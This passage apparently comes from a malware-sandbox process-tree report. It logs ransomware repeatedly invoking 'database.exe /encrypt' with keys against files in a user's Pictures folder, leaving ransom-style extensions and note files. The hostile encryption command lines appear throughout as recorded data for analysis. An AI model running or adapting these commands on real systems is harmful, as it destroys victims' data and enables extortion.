                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\My Wallpaper.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\NewResolve.gif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\OutRestore.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushOut.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushRepair.tif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushSearch.svg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ReadRegister.gif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ReceiveConvertFrom.emz.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RegisterBlock.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RenameSearch.emf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RequestProtect.svg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ResolveCopy.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RestartHide.raw.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUnblock.tif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUninstall.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
